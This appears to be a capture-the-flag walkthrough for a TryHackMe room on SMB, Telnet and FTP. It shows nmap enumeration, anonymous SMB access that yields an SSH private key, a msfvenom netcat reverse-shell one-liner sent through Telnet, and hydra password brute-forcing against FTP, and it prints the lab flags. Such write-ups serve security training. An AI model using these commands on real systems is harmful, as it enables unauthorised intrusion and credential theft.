https://tryhackme.com/access

SMB

SMB — Server Message Block Protocol — is a client-server communication protocol used for sharing access to files, printers, serial ports, and other resources on a network.

The SMB protocol is known as a response-request protocol, meaning that it transmits multiple messages between the client and server to establish a connection. Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI, or IPX/SPX.

Samba, an open source server that supports the SMB protocol, was released for Unix systems.

None

Enumeration SMB

In this, we have to start the machine first to get ip address of the machine to enumerate the machines.

1. Port Scanning

None
nmap -sC -sV -O -T4 10.49.143.109 -oN nmap_scan_network_service

Open ports:

22 — ssh

139 — Samba

445 — Samba

2. Enum4linux

Enum4linux is a tool for enumerating SMB shares on both Windows and Linux systems.

enum4linux 10.49.143.109

"enum4linux [options] ip"

TAG FUNCTION

-U: get userlist -M: get machine list -N: get namelist dump (different from -U and-M) -S: get sharelist -P: get password policy information -G: get group and member list

-a: all of the above (full basic enumeration)

Types of SMB Exploit

While there are vulnerabilities such as CVE-2017–7494 that can allow remote code execution by exploiting SMB, you're more likely to encounter a situation where the best way into a system is due to misconfigurations in the system. In this case, we're going to be exploiting anonymous SMB share access- a common misconfiguration that can allow us to gain information that will lead to a shell.

SMBClient:

Syntax: smbclient //[IP]/[SHARE] -U [USERNAME] -p [PORT]

smbclient //10.49.143.109/profiles -U Anonymous -p 445
ls
more "Working Form Home Information.txt"
None
cd .ssh
get id_rsa

Login ssh:

ssh -i id_rsa cactus@10.49.143.109
ls
cat smb.txt

THM{smb_is_fun_eh?}

Telnet

Telnet is an application protocol which allows you, with the use of a telnet client, to connect to and execute commands on a remote machine that's hosting a telnet server.

Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH where transmitted data is encrypted.

You can connect to a telnet server with the following syntax: "telnet [ip] [port]"

Enumerating Telnet:

  1. Port Scanning
nmap -Pn -vv -p- -sV 10.49.138.39 -oN telnet_nmap_scan
None
nmap -Pn -vv -A -p 8012 10.49.138.39 -oN telnet_8012_nmap_scan
None

Types of Telnet Exploit

Telnet, being a protocol, is in and of itself insecure for the reasons we talked about earlier. It lacks encryption, so sends all communication over plaintext, and for the most part has poor access control. There are CVE's for Telnet client and server systems, however, so when exploiting you can check for those on:

What is a Reverse Shell?

A "shell" can simply be described as a piece of code or program which can be used to gain code or command execution on a device.

A reverse shell is a type of shell in which the target machine communicates back to the attacking machine.

None
telnet 10.49.138.39 8012
None

Start a tcpdump listener on your local machine.

If using your own machine with the OpenVPN connection, use:

  • sudo tcpdump ip proto \\icmp -i tun0

If using the AttackBox, use:

  • sudo tcpdump ip proto \\icmp -i ens5

This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

ping 192.168.186.9 -c 1

Reverse Shell Payload

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.186.9 lport=4444 R
None

run below cmd in a new tab:

nc -nvlp 4444 
.RUN mkfifo /tmp/rynjcid; nc 192.168.186.9 4444 0</tmp/rynjcid | /bin/sh >/tmp/rynjcid 2>&1; rm /tmp/rynjcid

Get shell!!!

ls
cat flag.txt

THM{y0u_g0t_th3_t3ln3t_fl4g}

FTP

File Transfer Protocol (FTP) is, as the name suggests , a protocol used to allow remote transfer of files over a network. It uses a client-server model to do this, and- as we'll come on to later- relays commands and data in a very efficient way.

How does FTP work?

A typical FTP session operates using two channels:

  • a command (sometimes called the control) channel
  • a data channel.

Enumerating FTP

  1. Port Scanning
nmap -Pn -vv -sV -sC 10.48.173.185 -oN FTP_nmap_scan
None
ftp 10.48.173.185
None
less PUBLIC_NOTICE.txt
None

Types of FTP Exploit

hydra:

Hydra is a very fast online password cracking tool, which can perform rapid dictionary attacks against more than 50 Protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more.

The syntax for the command we're going to use to find the passwords is this:

"hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp"

Let's break it down:

SECTION FUNCTION

hydra Runs the hydra tool

-t 4 : Number of parallel connections per target

-l : [user] Points to the user who's account you're trying to compromise

-P : [path to dictionary] Points to the file containing the list of possible passwords

-vV : Sets verbose mode to very verbose, shows the login+pass combination for each attempt

[machine IP] : The IP address of the target machine

ftp / protocol : Sets the protocol

hydra -l mike -P /usr/share/wordlists/rockyou.txt 10.48.173.185 ftp
None

login using this credentials mike:password

ftp 10.48.173.185
ls
less ftp.txt

THM{y0u_g0t_th3_ftp_fl4g}